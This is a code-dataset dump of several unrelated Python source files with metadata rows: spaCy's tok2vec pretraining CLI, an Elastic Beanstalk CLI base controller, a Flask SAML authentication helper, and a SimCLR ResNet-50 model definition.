] | null | null | null | spacy/cli/pretrain.py | Ali-Tahir/spaCy | 9e210fa7fdb8e376655e7a7ab7debd3ffd718a63 | [
"MIT"
] | null | null | null | # coding: utf8
from __future__ import print_function, unicode_literals
import plac
import random
import numpy
import time
import re
from collections import Counter
from pathlib import Path
from thinc.v2v import Affine, Maxout
from thinc.misc import LayerNorm as LN
from thinc.neural.util import prefer_gpu
from wasabi import Printer
import srsly
from ..errors import Errors
from ..tokens import Doc
from ..attrs import ID, HEAD
from .._ml import Tok2Vec, flatten, chain, create_default_optimizer
from .._ml import masked_language_model, get_cossim_loss
from .. import util
from .train import _load_pretrained_tok2vec
@plac.annotations(
texts_loc=(
"Path to JSONL file with raw texts to learn from, with text provided as the key 'text' or tokens as the "
"key 'tokens'",
"positional",
None,
str,
),
vectors_model=("Name or path to spaCy model with vectors to learn from"),
output_dir=("Directory to write models to on each epoch", "positional", None, str),
width=("Width of CNN layers", "option", "cw", int),
depth=("Depth of CNN layers", "option", "cd", int),
cnn_window=("Window size for CNN layers", "option", "cW", int),
cnn_pieces=("Maxout size for CNN layers. 1 for Mish", "option", "cP", int),
use_chars=("Whether to use character-based embedding", "flag", "chr", bool),
sa_depth=("Depth of self-attention layers", "option", "sa", int),
bilstm_depth=("Depth of BiLSTM layers (requires PyTorch)", "option", "lstm", int),
embed_rows=("Number of embedding rows", "option", "er", int),
loss_func=(
"Loss function to use for the objective. Either 'L2' or 'cosine'",
"option",
"L",
str,
),
use_vectors=("Whether to use the static vectors as input features", "flag", "uv"),
dropout=("Dropout rate", "option", "d", float),
batch_size=("Number of words per training batch", "option", "bs", int),
max_length=(
"Max words per example. Longer examples are discarded",
"option",
"xw",
int,
),
min_length=(
"Min words per example. Shorter examples are discarded",
"option",
"nw",
int,
),
seed=("Seed for random number generators", "option", "s", int),
n_iter=("Number of iterations to pretrain", "option", "i", int),
n_save_every=("Save model every X batches.", "option", "se", int),
init_tok2vec=(
"Path to pretrained weights for the token-to-vector parts of the models. See 'spacy pretrain'. Experimental.",
"option",
"t2v",
Path,
),
epoch_start=(
"The epoch to start counting at. Only relevant when using '--init-tok2vec' and the given weight file has been "
"renamed. Prevents unintended overwriting of existing weight files.",
"option",
"es",
int,
),
)
def pretrain(
texts_loc,
vectors_model,
output_dir,
width=96,
depth=4,
bilstm_depth=0,
cnn_pieces=3,
sa_depth=0,
use_chars=False,
cnn_window=1,
embed_rows=2000,
loss_func="cosine",
use_vectors=False,
dropout=0.2,
n_iter=1000,
batch_size=3000,
max_length=500,
min_length=5,
seed=0,
n_save_every=None,
init_tok2vec=None,
epoch_start=None,
):
"""
Pre-train the 'token-to-vector' (tok2vec) layer of pipeline components,
using an approximate language-modelling objective. Specifically, we load
pretrained vectors, and train a component like a CNN, BiLSTM, etc to predict
vectors which match the pretrained ones. The weights are saved to a directory
after each epoch. You can then pass a path to one of these pretrained weights
files to the 'spacy train' command.
This technique may be especially helpful if you have little labelled data.
However, it's still quite experimental, so your mileage may vary.
To load the weights back in during 'spacy train', you need to ensure
all settings are the same between pretraining and training. The API and
errors around this need some improvement.
"""
config = dict(locals())
for key in config:
if isinstance(config[key], Path):
config[key] = str(config[key])
msg = Printer()
util.fix_random_seed(seed)
has_gpu = prefer_gpu()
if has_gpu:
import torch
torch.set_default_tensor_type("torch.cuda.FloatTensor")
msg.info("Using GPU" if has_gpu else "Not using GPU")
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir()
msg.good("Created output directory")
srsly.write_json(output_dir / "config.json", config)
msg.good("Saved settings to config.json")
# Load texts from file or stdin
if texts_loc != "-": # reading from a file
texts_loc = Path(texts_loc)
if not texts_loc.exists():
msg.fail("Input text file doesn't exist", texts_loc, exits=1)
with msg.loading("Loading input texts..."):
texts = list(srsly.read_jsonl(texts_loc))
if not texts:
msg.fail("Input file is empty", texts_loc, exits=1)
msg.good("Loaded input texts")
random.shuffle(texts)
else: # reading from stdin
msg.text("Reading input text from stdin...")
texts = srsly.read_jsonl("-")
with msg.loading("Loading model '{}'...".format(vectors_model)):
nlp = util.load_model(vectors_model)
msg.good("Loaded model '{}'".format(vectors_model))
pretrained_vectors = None if not use_vectors else nlp.vocab.vectors.name
model = create_pretraining_model(
nlp,
Tok2Vec(
width,
embed_rows,
conv_depth=depth,
pretrained_vectors=pretrained_vectors,
bilstm_depth=bilstm_depth, # Requires PyTorch. Experimental.
subword_features=not use_chars, # Set to False for Chinese etc
cnn_maxout_pieces=cnn_pieces, # If set to 1, use Mish activation.
),
)
# Load in pretrained weights
if init_tok2vec is not None:
components = _load_pretrained_tok2vec(nlp, init_tok2vec)
msg.text("Loaded pretrained tok2vec for: {}".format(components))
# Parse the epoch number from the given weight file
model_name = re.search(r"model\d+\.bin", str(init_tok2vec))
if model_name:
# Default weight file name so read epoch_start from it by cutting off 'model' and '.bin'
epoch_start = int(model_name.group(0)[5:][:-4]) + 1
else:
if not epoch_start:
msg.fail(
"You have to use the '--epoch-start' argument when using a renamed weight file for "
"'--init-tok2vec'",
exits=True,
)
elif epoch_start < 0:
msg.fail(
"The argument '--epoch-start' has to be greater or equal to 0. '%d' is invalid"
% epoch_start,
exits=True,
)
else:
# Without '--init-tok2vec' the '--epoch-start' argument is ignored
epoch_start = 0
optimizer = create_default_optimizer(model.ops)
tracker = ProgressTracker(frequency=10000)
msg.divider("Pre-training tok2vec layer - starting at epoch %d" % epoch_start)
row_settings = {"widths": (3, 10, 10, 6, 4), "aligns": ("r", "r", "r", "r", "r")}
msg.row(("#", "# Words", "Total Loss", "Loss", "w/s"), **row_settings)
def _save_model(epoch, is_temp=False):
is_temp_str = ".temp" if is_temp else ""
with model.use_params(optimizer.averages):
with (output_dir / ("model%d%s.bin" % (epoch, is_temp_str))).open(
"wb"
) as file_:
file_.write(model.tok2vec.to_bytes())
log = {
"nr_word": tracker.nr_word,
"loss": tracker.loss,
"epoch_loss": tracker.epoch_loss,
"epoch": epoch,
}
with (output_dir / "log.jsonl").open("a") as file_:
file_.write(srsly.json_dumps(log) + "\n")
skip_counter = 0
for epoch in range(epoch_start, n_iter + epoch_start):
for batch_id, batch in enumerate(
util.minibatch_by_words(((text, None) for text in texts), size=batch_size)
):
docs, count = make_docs(
nlp,
[text for (text, _) in batch],
max_length=max_length,
min_length=min_length,
)
skip_counter += count
loss = make_update(
model, docs, optimizer, objective=loss_func, drop=dropout
)
progress = tracker.update(epoch, loss, docs)
if progress:
msg.row(progress, **row_settings)
if texts_loc == "-" and tracker.words_per_epoch[epoch] >= 10 ** 7:
break
if n_save_every and (batch_id % n_save_every == 0):
_save_model(epoch, is_temp=True)
_save_model(epoch)
tracker.epoch_loss = 0.0
if texts_loc != "-":
# Reshuffle the texts if texts were loaded from a file
random.shuffle(texts)
if skip_counter > 0:
msg.warn("Skipped {count} empty values".format(count=str(skip_counter)))
msg.good("Successfully finished pretrain")
def make_update(model, docs, optimizer, drop=0.0, objective="L2"):
"""Perform an update over a single batch of documents.
docs (iterable): A batch of `Doc` objects.
drop (float): The dropout rate.
optimizer (callable): An optimizer.
RETURNS loss: A float for the loss.
"""
predictions, backprop = model.begin_update(docs, drop=drop)
loss, gradients = get_vectors_loss(model.ops, docs, predictions, objective)
backprop(gradients, sgd=optimizer)
# Don't want to return a cupy object here
# The gradients are modified in-place by the BERT MLM,
# so we get an accurate loss
return float(loss)
def make_docs(nlp, batch, min_length, max_length):
docs = []
skip_count = 0
for record in batch:
if not isinstance(record, dict):
raise TypeError(Errors.E137.format(type=type(record), line=record))
if "tokens" in record:
words = record["tokens"]
if not words:
skip_count += 1
continue
doc = Doc(nlp.vocab, words=words)
elif "text" in record:
text = record["text"]
if not text:
skip_count += 1
continue
doc = nlp.make_doc(text)
else:
raise ValueError(Errors.E138.format(text=record))
if "heads" in record:
heads = record["heads"]
heads = numpy.asarray(heads, dtype="uint64")
heads = heads.reshape((len(doc), 1))
doc = doc.from_array([HEAD], heads)
if len(doc) >= min_length and len(doc) < max_length:
docs.append(doc)
return docs, skip_count
def get_vectors_loss(ops, docs, prediction, objective="L2"):
"""Compute a mean-squared error loss between the documents' vectors and
the prediction.
Note that this is ripe for customization! We could compute the vectors
in some other word, e.g. with an LSTM language model, or use some other
type of objective.
"""
# The simplest way to implement this would be to vstack the
# token.vector values, but that's a bit inefficient, especially on GPU.
# Instead we fetch the index into the vectors table for each of our tokens,
# and look them up all at once. This prevents data copying.
ids = ops.flatten([doc.to_array(ID).ravel() for doc in docs])
target = docs[0].vocab.vectors.data[ids]
if objective == "L2":
d_target = prediction - target
loss = (d_target ** 2).sum()
elif objective == "cosine":
loss, d_target = get_cossim_loss(prediction, target)
else:
raise ValueError(Errors.E142.format(loss_func=objective))
return loss, d_target
def create_pretraining_model(nlp, tok2vec):
"""Define a network for the pretraining. We simply add an output layer onto
the tok2vec input model. The tok2vec input model needs to be a model that
takes a batch of Doc objects (as a list), and returns a list of arrays.
Each array in the output needs to have one row per token in the doc.
"""
output_size = nlp.vocab.vectors.data.shape[1]
output_layer = chain(
LN(Maxout(300, pieces=3)), Affine(output_size, drop_factor=0.0)
)
# This is annoying, but the parser etc have the flatten step after
# the tok2vec. To load the weights in cleanly, we need to match
# the shape of the models' components exactly. So what we cann
# "tok2vec" has to be the same set of processes as what the components do.
tok2vec = chain(tok2vec, flatten)
model = chain(tok2vec, output_layer)
model = masked_language_model(nlp.vocab, model)
model.tok2vec = tok2vec
model.output_layer = output_layer
model.begin_training([nlp.make_doc("Give it a doc to infer shapes")])
return model
class ProgressTracker(object):
def __init__(self, frequency=1000000):
self.loss = 0.0
self.prev_loss = 0.0
self.nr_word = 0
self.words_per_epoch = Counter()
self.frequency = frequency
self.last_time = time.time()
self.last_update = 0
self.epoch_loss = 0.0
def update(self, epoch, loss, docs):
self.loss += loss
self.epoch_loss += loss
words_in_batch = sum(len(doc) for doc in docs)
self.words_per_epoch[epoch] += words_in_batch
self.nr_word += words_in_batch
words_since_update = self.nr_word - self.last_update
if words_since_update >= self.frequency:
wps = words_since_update / (time.time() - self.last_time)
self.last_update = self.nr_word
self.last_time = time.time()
loss_per_word = self.loss - self.prev_loss
status = (
epoch,
self.nr_word,
_smart_round(self.loss, width=10),
_smart_round(loss_per_word, width=6),
int(wps),
)
self.prev_loss = float(self.loss)
return status
else:
return None
def _smart_round(figure, width=10, max_decimal=4):
"""Round large numbers as integers, smaller numbers as decimals."""
n_digits = len(str(int(figure)))
n_decimal = width - (n_digits + 1)
if n_decimal <= 1:
return str(int(figure))
else:
n_decimal = min(n_decimal, max_decimal)
format_str = "%." + str(n_decimal) + "f"
return format_str % figure
| 37.737913 | 119 | 0.617221 |
from __future__ import print_function, unicode_literals
import plac
import random
import numpy
import time
import re
from collections import Counter
from pathlib import Path
from thinc.v2v import Affine, Maxout
from thinc.misc import LayerNorm as LN
from thinc.neural.util import prefer_gpu
from wasabi import Printer
import srsly
from ..errors import Errors
from ..tokens import Doc
from ..attrs import ID, HEAD
from .._ml import Tok2Vec, flatten, chain, create_default_optimizer
from .._ml import masked_language_model, get_cossim_loss
from .. import util
from .train import _load_pretrained_tok2vec
@plac.annotations(
texts_loc=(
"Path to JSONL file with raw texts to learn from, with text provided as the key 'text' or tokens as the "
"key 'tokens'",
"positional",
None,
str,
),
vectors_model=("Name or path to spaCy model with vectors to learn from"),
output_dir=("Directory to write models to on each epoch", "positional", None, str),
width=("Width of CNN layers", "option", "cw", int),
depth=("Depth of CNN layers", "option", "cd", int),
cnn_window=("Window size for CNN layers", "option", "cW", int),
cnn_pieces=("Maxout size for CNN layers. 1 for Mish", "option", "cP", int),
use_chars=("Whether to use character-based embedding", "flag", "chr", bool),
sa_depth=("Depth of self-attention layers", "option", "sa", int),
bilstm_depth=("Depth of BiLSTM layers (requires PyTorch)", "option", "lstm", int),
embed_rows=("Number of embedding rows", "option", "er", int),
loss_func=(
"Loss function to use for the objective. Either 'L2' or 'cosine'",
"option",
"L",
str,
),
use_vectors=("Whether to use the static vectors as input features", "flag", "uv"),
dropout=("Dropout rate", "option", "d", float),
batch_size=("Number of words per training batch", "option", "bs", int),
max_length=(
"Max words per example. Longer examples are discarded",
"option",
"xw",
int,
),
min_length=(
"Min words per example. Shorter examples are discarded",
"option",
"nw",
int,
),
seed=("Seed for random number generators", "option", "s", int),
n_iter=("Number of iterations to pretrain", "option", "i", int),
n_save_every=("Save model every X batches.", "option", "se", int),
init_tok2vec=(
"Path to pretrained weights for the token-to-vector parts of the models. See 'spacy pretrain'. Experimental.",
"option",
"t2v",
Path,
),
epoch_start=(
"The epoch to start counting at. Only relevant when using '--init-tok2vec' and the given weight file has been "
"renamed. Prevents unintended overwriting of existing weight files.",
"option",
"es",
int,
),
)
def pretrain(
texts_loc,
vectors_model,
output_dir,
width=96,
depth=4,
bilstm_depth=0,
cnn_pieces=3,
sa_depth=0,
use_chars=False,
cnn_window=1,
embed_rows=2000,
loss_func="cosine",
use_vectors=False,
dropout=0.2,
n_iter=1000,
batch_size=3000,
max_length=500,
min_length=5,
seed=0,
n_save_every=None,
init_tok2vec=None,
epoch_start=None,
):
config = dict(locals())
for key in config:
if isinstance(config[key], Path):
config[key] = str(config[key])
msg = Printer()
util.fix_random_seed(seed)
has_gpu = prefer_gpu()
if has_gpu:
import torch
torch.set_default_tensor_type("torch.cuda.FloatTensor")
msg.info("Using GPU" if has_gpu else "Not using GPU")
output_dir = Path(output_dir)
if not output_dir.exists():
output_dir.mkdir()
msg.good("Created output directory")
srsly.write_json(output_dir / "config.json", config)
msg.good("Saved settings to config.json")
if texts_loc != "-":
texts_loc = Path(texts_loc)
if not texts_loc.exists():
msg.fail("Input text file doesn't exist", texts_loc, exits=1)
with msg.loading("Loading input texts..."):
texts = list(srsly.read_jsonl(texts_loc))
if not texts:
msg.fail("Input file is empty", texts_loc, exits=1)
msg.good("Loaded input texts")
random.shuffle(texts)
else: # reading from stdin
msg.text("Reading input text from stdin...")
texts = srsly.read_jsonl("-")
with msg.loading("Loading model '{}'...".format(vectors_model)):
nlp = util.load_model(vectors_model)
msg.good("Loaded model '{}'".format(vectors_model))
pretrained_vectors = None if not use_vectors else nlp.vocab.vectors.name
model = create_pretraining_model(
nlp,
Tok2Vec(
width,
embed_rows,
conv_depth=depth,
pretrained_vectors=pretrained_vectors,
bilstm_depth=bilstm_depth, # Requires PyTorch. Experimental.
subword_features=not use_chars, # Set to False for Chinese etc
cnn_maxout_pieces=cnn_pieces, # If set to 1, use Mish activation.
),
)
# Load in pretrained weights
if init_tok2vec is not None:
components = _load_pretrained_tok2vec(nlp, init_tok2vec)
msg.text("Loaded pretrained tok2vec for: {}".format(components))
# Parse the epoch number from the given weight file
model_name = re.search(r"model\d+\.bin", str(init_tok2vec))
if model_name:
# Default weight file name so read epoch_start from it by cutting off 'model' and '.bin'
epoch_start = int(model_name.group(0)[5:][:-4]) + 1
else:
if not epoch_start:
msg.fail(
"You have to use the '--epoch-start' argument when using a renamed weight file for "
"'--init-tok2vec'",
exits=True,
)
elif epoch_start < 0:
msg.fail(
"The argument '--epoch-start' has to be greater or equal to 0. '%d' is invalid"
% epoch_start,
exits=True,
)
else:
# Without '--init-tok2vec' the '--epoch-start' argument is ignored
epoch_start = 0
optimizer = create_default_optimizer(model.ops)
tracker = ProgressTracker(frequency=10000)
msg.divider("Pre-training tok2vec layer - starting at epoch %d" % epoch_start)
row_settings = {"widths": (3, 10, 10, 6, 4), "aligns": ("r", "r", "r", "r", "r")}
msg.row(("#", "# Words", "Total Loss", "Loss", "w/s"), **row_settings)
def _save_model(epoch, is_temp=False):
is_temp_str = ".temp" if is_temp else ""
with model.use_params(optimizer.averages):
with (output_dir / ("model%d%s.bin" % (epoch, is_temp_str))).open(
"wb"
) as file_:
file_.write(model.tok2vec.to_bytes())
log = {
"nr_word": tracker.nr_word,
"loss": tracker.loss,
"epoch_loss": tracker.epoch_loss,
"epoch": epoch,
}
with (output_dir / "log.jsonl").open("a") as file_:
file_.write(srsly.json_dumps(log) + "\n")
skip_counter = 0
for epoch in range(epoch_start, n_iter + epoch_start):
for batch_id, batch in enumerate(
util.minibatch_by_words(((text, None) for text in texts), size=batch_size)
):
docs, count = make_docs(
nlp,
[text for (text, _) in batch],
max_length=max_length,
min_length=min_length,
)
skip_counter += count
loss = make_update(
model, docs, optimizer, objective=loss_func, drop=dropout
)
progress = tracker.update(epoch, loss, docs)
if progress:
msg.row(progress, **row_settings)
if texts_loc == "-" and tracker.words_per_epoch[epoch] >= 10 ** 7:
break
if n_save_every and (batch_id % n_save_every == 0):
_save_model(epoch, is_temp=True)
_save_model(epoch)
tracker.epoch_loss = 0.0
if texts_loc != "-":
# Reshuffle the texts if texts were loaded from a file
random.shuffle(texts)
if skip_counter > 0:
msg.warn("Skipped {count} empty values".format(count=str(skip_counter)))
msg.good("Successfully finished pretrain")
def make_update(model, docs, optimizer, drop=0.0, objective="L2"):
predictions, backprop = model.begin_update(docs, drop=drop)
loss, gradients = get_vectors_loss(model.ops, docs, predictions, objective)
backprop(gradients, sgd=optimizer)
# Don't want to return a cupy object here
return float(loss)
def make_docs(nlp, batch, min_length, max_length):
docs = []
skip_count = 0
for record in batch:
if not isinstance(record, dict):
raise TypeError(Errors.E137.format(type=type(record), line=record))
if "tokens" in record:
words = record["tokens"]
if not words:
skip_count += 1
continue
doc = Doc(nlp.vocab, words=words)
elif "text" in record:
text = record["text"]
if not text:
skip_count += 1
continue
doc = nlp.make_doc(text)
else:
raise ValueError(Errors.E138.format(text=record))
if "heads" in record:
heads = record["heads"]
heads = numpy.asarray(heads, dtype="uint64")
heads = heads.reshape((len(doc), 1))
doc = doc.from_array([HEAD], heads)
if len(doc) >= min_length and len(doc) < max_length:
docs.append(doc)
return docs, skip_count
def get_vectors_loss(ops, docs, prediction, objective="L2"):
# Instead we fetch the index into the vectors table for each of our tokens,
# and look them up all at once. This prevents data copying.
ids = ops.flatten([doc.to_array(ID).ravel() for doc in docs])
target = docs[0].vocab.vectors.data[ids]
if objective == "L2":
d_target = prediction - target
loss = (d_target ** 2).sum()
elif objective == "cosine":
loss, d_target = get_cossim_loss(prediction, target)
else:
raise ValueError(Errors.E142.format(loss_func=objective))
return loss, d_target
def create_pretraining_model(nlp, tok2vec):
output_size = nlp.vocab.vectors.data.shape[1]
output_layer = chain(
LN(Maxout(300, pieces=3)), Affine(output_size, drop_factor=0.0)
)
# This is annoying, but the parser etc have the flatten step after
# the tok2vec. To load the weights in cleanly, we need to match
# the shape of the models' components exactly. So what we cann
tok2vec = chain(tok2vec, flatten)
model = chain(tok2vec, output_layer)
model = masked_language_model(nlp.vocab, model)
model.tok2vec = tok2vec
model.output_layer = output_layer
model.begin_training([nlp.make_doc("Give it a doc to infer shapes")])
return model
class ProgressTracker(object):
def __init__(self, frequency=1000000):
self.loss = 0.0
self.prev_loss = 0.0
self.nr_word = 0
self.words_per_epoch = Counter()
self.frequency = frequency
self.last_time = time.time()
self.last_update = 0
self.epoch_loss = 0.0
def update(self, epoch, loss, docs):
self.loss += loss
self.epoch_loss += loss
words_in_batch = sum(len(doc) for doc in docs)
self.words_per_epoch[epoch] += words_in_batch
self.nr_word += words_in_batch
words_since_update = self.nr_word - self.last_update
if words_since_update >= self.frequency:
wps = words_since_update / (time.time() - self.last_time)
self.last_update = self.nr_word
self.last_time = time.time()
loss_per_word = self.loss - self.prev_loss
status = (
epoch,
self.nr_word,
_smart_round(self.loss, width=10),
_smart_round(loss_per_word, width=6),
int(wps),
)
self.prev_loss = float(self.loss)
return status
else:
return None
def _smart_round(figure, width=10, max_decimal=4):
n_digits = len(str(int(figure)))
n_decimal = width - (n_digits + 1)
if n_decimal <= 1:
return str(int(figure))
else:
n_decimal = min(n_decimal, max_decimal)
format_str = "%." + str(n_decimal) + "f"
return format_str % figure
| true | true |
f7236f96ecf229c2c3cc9f3243a298fecf810335 | 3,143 | py | Python | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2018-04-19T19:56:53.000Z | 2021-06-28T19:53:41.000Z | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 1 | 2017-04-27T12:06:05.000Z | 2017-04-27T12:06:05.000Z | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2016-10-12T23:54:55.000Z | 2020-07-25T23:28:25.000Z | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import textwrap
import sys
from cement.core import controller
from ebcli import __version__
from ..resources.strings import strings, flag_text
from ..core import io
class EbBaseController(controller.CementBaseController):
"""
This is the application base controller.
It handles eb when no sub-commands are given
"""
class Meta:
label = 'base'
description = strings['base.info']
# usage = eb {cmd} --option
arguments = [
(['--version'], dict(action='store_true',
help=flag_text['base.version'])),
]
epilog = strings['base.epilog']
@controller.expose(hide=True)
def default(self):
if self.app.pargs.version:
io.echo(strings['app.version_message'], __version__,
'(Python', sys.version[0:5] + ')')
else:
self.app.args.print_help()
@property
def _help_text(self):
"""Returns the help text displayed when '--help' is passed."""
longest = 0
def pad(label):
padlength = longest - len(label) + 2
padding = ' '
if padlength < 0:
for x in range(0, longest):
padding += ' '
else:
for x in range(0, padlength):
padding += ' '
return padding
help_txt = ''
for label in self._visible_commands:
# get longest command
if len(label) > longest:
longest = len(label)
for label in self._visible_commands:
cmd = self._dispatch_map[label]
cmd_txt = ' '
if len(cmd['aliases']) > 0 and cmd['aliases_only']:
if len(cmd['aliases']) > 1:
first = cmd['aliases'].pop(0)
cmd_txt += "%s (alias: %s)\n" % \
(first, ', '.join(cmd['aliases']))
else:
cmd_txt += "%s" % cmd['alias'][0]
elif len(cmd['aliases']) > 0:
cmd_txt += "%s (alias: %s)\n" % (label, ', '.join(cmd['aliases']))
else:
cmd_txt += label
if cmd['help']:
cmd_txt += pad(cmd_txt) + "%s\n" % cmd['help']
else:
cmd_txt += "\n"
help_txt += cmd_txt
if len(help_txt) > 0:
txt = '''%s
commands:
%s
''' % (self._meta.description, help_txt)
else:
txt = self._meta.description
return textwrap.dedent(txt) | 31.43 | 82 | 0.535157 |
import textwrap
import sys
from cement.core import controller
from ebcli import __version__
from ..resources.strings import strings, flag_text
from ..core import io
class EbBaseController(controller.CementBaseController):
class Meta:
label = 'base'
description = strings['base.info']
arguments = [
(['--version'], dict(action='store_true',
help=flag_text['base.version'])),
]
epilog = strings['base.epilog']
@controller.expose(hide=True)
def default(self):
if self.app.pargs.version:
io.echo(strings['app.version_message'], __version__,
'(Python', sys.version[0:5] + ')')
else:
self.app.args.print_help()
@property
def _help_text(self):
longest = 0
def pad(label):
padlength = longest - len(label) + 2
padding = ' '
if padlength < 0:
for x in range(0, longest):
padding += ' '
else:
for x in range(0, padlength):
padding += ' '
return padding
help_txt = ''
for label in self._visible_commands:
if len(label) > longest:
longest = len(label)
for label in self._visible_commands:
cmd = self._dispatch_map[label]
cmd_txt = ' '
if len(cmd['aliases']) > 0 and cmd['aliases_only']:
if len(cmd['aliases']) > 1:
first = cmd['aliases'].pop(0)
cmd_txt += "%s (alias: %s)\n" % \
(first, ', '.join(cmd['aliases']))
else:
cmd_txt += "%s" % cmd['alias'][0]
elif len(cmd['aliases']) > 0:
cmd_txt += "%s (alias: %s)\n" % (label, ', '.join(cmd['aliases']))
else:
cmd_txt += label
if cmd['help']:
cmd_txt += pad(cmd_txt) + "%s\n" % cmd['help']
else:
cmd_txt += "\n"
help_txt += cmd_txt
if len(help_txt) > 0:
txt = '''%s
commands:
%s
''' % (self._meta.description, help_txt)
else:
txt = self._meta.description
return textwrap.dedent(txt) | true | true |
f7237035cf836f6dcb5fc1c148dcd2432f440406 | 2,212 | py | Python | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 1 | 2019-11-13T11:52:47.000Z | 2019-11-13T11:52:47.000Z | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 106 | 2017-10-25T14:41:07.000Z | 2021-09-20T10:39:57.000Z | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 6 | 2019-03-20T06:55:25.000Z | 2020-02-03T11:26:19.000Z | # This file is part of the Etsin service
#
# Copyright 2017-2018 Ministry of Education and Culture, Finland
#
# :author: CSC - IT Center for Science Ltd., Espoo Finland <servicedesk@csc.fi>
# :license: MIT
"""Direct authentication related functionalities"""
from urllib.parse import urlparse
from flask import session, current_app
from onelogin.saml2.auth import OneLogin_Saml2_Auth
def get_saml_auth(flask_request, service):
"""Get saml auth
Args:
flask_request (object): flask.Request
Returns:
object: SP SAML instance.
"""
return OneLogin_Saml2_Auth(prepare_flask_request_for_saml(flask_request, service), custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def init_saml_auth(saml_prepared_flask_request, service):
"""Init saml auth
Args:
saml_prepared_flask_request (object): Prepared flask request.
Returns:
object: Initializes the SP SAML instance.
"""
return OneLogin_Saml2_Auth(saml_prepared_flask_request, custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def is_authenticated_through_direct_proxy():
"""Is user authenticated through the old proxy solution
Returns:
bool: Is auth.
"""
if ('samlUserdata' in session and len(session.get('samlUserdata', None)) > 0):
return True
return False
def prepare_flask_request_for_saml(request, service):
"""Prepare Flask request for saml
Args:
request (object): flask.Request
Returns:
dict: Request data.
"""
# If server is behind proxys or balancers use the HTTP_X_FORWARDED fields
url_data = urlparse(request.url)
return {
'https': 'on' if request.scheme == 'https' else 'off',
'http_host': current_app.config.get('SHARED_DOMAIN_NAME_FOR_PROXY'),
'server_port': url_data.port,
'script_name': request.path,
'get_data': request.args.copy(),
'post_data': request.form.copy()
}
def reset_flask_session_on_login():
"""Reset Flask session on login"""
session.clear()
session.permanent = True
def reset_flask_session_on_logout():
"""Reset Flask session on logout"""
session.clear() | 28 | 158 | 0.698915 |
from urllib.parse import urlparse
from flask import session, current_app
from onelogin.saml2.auth import OneLogin_Saml2_Auth
def get_saml_auth(flask_request, service):
return OneLogin_Saml2_Auth(prepare_flask_request_for_saml(flask_request, service), custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def init_saml_auth(saml_prepared_flask_request, service):
return OneLogin_Saml2_Auth(saml_prepared_flask_request, custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def is_authenticated_through_direct_proxy():
if ('samlUserdata' in session and len(session.get('samlUserdata', None)) > 0):
return True
return False
def prepare_flask_request_for_saml(request, service):
url_data = urlparse(request.url)
return {
'https': 'on' if request.scheme == 'https' else 'off',
'http_host': current_app.config.get('SHARED_DOMAIN_NAME_FOR_PROXY'),
'server_port': url_data.port,
'script_name': request.path,
'get_data': request.args.copy(),
'post_data': request.form.copy()
}
def reset_flask_session_on_login():
session.clear()
session.permanent = True
def reset_flask_session_on_logout():
session.clear() | true | true |
f723714fb358806aa9a8ab80e838af445bd65bde | 959 | py | Python | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | 2 | 2021-12-22T15:18:02.000Z | 2022-03-10T11:46:38.000Z | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | null | null | null | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.cuda import amp
from torchvision.models import resnet50
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class Model(nn.Module):
def __init__(self, feature_dim=128, pretrained=False):
super(Model, self).__init__()
self.f = resnet50(pretrained=pretrained)
self.f.fc = Identity()
# projection head
self.g = nn.Sequential(nn.Linear(2048, 512, bias=False),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Linear(512, feature_dim, bias=True))
@amp.autocast()
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
| 29.96875 | 70 | 0.590198 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.cuda import amp
from torchvision.models import resnet50
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class Model(nn.Module):
def __init__(self, feature_dim=128, pretrained=False):
super(Model, self).__init__()
self.f = resnet50(pretrained=pretrained)
self.f.fc = Identity()
self.g = nn.Sequential(nn.Linear(2048, 512, bias=False),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Linear(512, feature_dim, bias=True))
@amp.autocast()
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
| true | true |
f7237157da0e8ce2915b5be1a4e908166945d727 | 3,708 | py | Python | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
